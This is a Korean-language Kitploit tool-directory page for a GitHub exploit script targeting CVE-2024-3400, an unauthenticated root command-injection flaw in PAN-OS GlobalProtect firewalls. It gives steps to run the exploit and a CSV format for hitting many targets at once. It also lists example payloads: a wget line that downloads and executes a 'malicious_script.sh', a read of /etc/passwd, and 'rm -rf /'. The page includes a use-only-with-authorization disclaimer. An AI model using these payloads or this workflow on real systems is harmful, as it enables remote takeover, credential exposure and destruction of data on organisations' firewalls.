Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-3400 — # CVE-2024-3400 익스플로잇 스크립트 PAN-OS GlobalProtect의 명령 주입 취약점으로, 인증 없이 루트 권한으로 원격 코드 실행을 허용합니다. 단일 대상 및 CSV 기반 다중 대상 익스플로잇을 지원합니다. | Kitploit
도구/GitHubGitHub/yuvvi01/cve-2024-3400
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

# CVE-2024-3400 익스플로잇 스크립트 PAN-OS GlobalProtect의 명령 주입 취약점으로, 인증 없이 루트 권한으로 원격 코드 실행을 허용합니다. 단일 대상 및 CSV 기반 다중 대상 익스플로잇을 지원합니다.

저장소 보기
11512년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PAN-OS 방화벽 익스플로잇 스크립트

이 스크립트는 PAN-OS 방화벽의 취약점 악용을 시연하기 위해 설계되었습니다. 방화벽의 API 엔드포인트에 특수하게 제작된 페이로드를 전송하여 임의의 명령을 실행합니다. 이 익스플로잇은 특정 PAN-OS 버전에서 Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 기능에 존재하는 명령 주입 취약점인 CVE-2024-3400을 대상으로 합니다. 특정 기능 구성으로 인해 인증되지 않은 공격자가 방화벽에서 루트 권한으로 임의의 코드를 실행할 수 있습니다.

참고: 이 스크립트는 법적 및 윤리적 목적으로만, 그리고 테스트 권한이 있는 시스템에서만 사용하시기 바랍니다.

사용법

이 프로젝트를 사용하려면 다음 단계를 따르세요:

  1. 이 저장소를 클론합니다:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. 저장소 디렉터리로 이동합니다:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. 필요한 모듈을 설치합니다:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. 파이썬 스크립트를 실행합니다.
    root@kitploit:~
    python3 exploit.py
    

프롬프트에 따라 취약한 PAN-OS 방화벽의 IP 주소와 실행할 페이로드를 입력합니다.

예시 페이로드

  1. 디렉터리 내용 나열:
    root@kitploit:~
    ls -la
    
    
  • 특정 파일의 내용 출력:
    root@kitploit:~
    cat /etc/passwd
    
    
  • 현재 시스템에 로그인한 사용자의 사용자 이름 출력:
    root@kitploit:~
    whoami
    
    
  • 인터넷에서 파일 다운로드(wget 또는 curl 설치 필요):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  • 이 명령은 매우 주의하세요:
    root@kitploit:~
    rm -rf /
    
  • 안전한 사용을 위한 지침

    SSL 인증서 검증

    스크립트는 PAN-OS 방화벽 서버의 SSL 인증서 파일 경로를 요청합니다. 경로를 입력하지 않으면 스크립트는 SSL 검증을 자동으로 false로 설정하여 SSL을 사실상 비활성화합니다.

    CSV 파일 지침

    이 스크립트를 사용하면 CSV 파일을 통해 취약한 PAN-OS 방화벽의 여러 대상을 공격할 수 있습니다. CSV 파일을 올바르게 구성하는 방법은 다음과 같습니다:

    CSV 파일 형식:

    CSV 파일에는 세 개의 열이 있어야 합니다:

    ipaddress: 취약한 PAN-OS 방화벽의 IP 주소. payload: 방화벽에서 실행할 페이로드. path/to/root_CA_certificate.pem: 루트 CA 인증서의 경로(인증서 검증이 비활성화된 경우 비워 둡니다).

    • CSV 파일 예시:
      root@kitploit:~
      ipaddress,payload,path/to/root_CA_certificate.pem
      192.168.1.1,exploit_payload1,/path/to/certificate.pem
      192.168.1.2,exploit_payload2,
      

    지침:

    지정된 형식으로 CSV 파일을 만듭니다. IP 주소, 페이로드, 루트 CA 인증서 경로(해당하는 경우)를 입력합니다. 루트 CA 인증서에 유효한 경로를 제공하거나, 인증서 검증이 비활성화된 경우 해당 필드를 비워 둡니다. 스크립트를 실행하고 프롬프트가 표시되면 CSV 파일을 사용하는 옵션을 선택합니다.

    참고 자료

    • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
    • https://security.paloaltonetworks.com/CVE-2024-3400
    도구 다운로드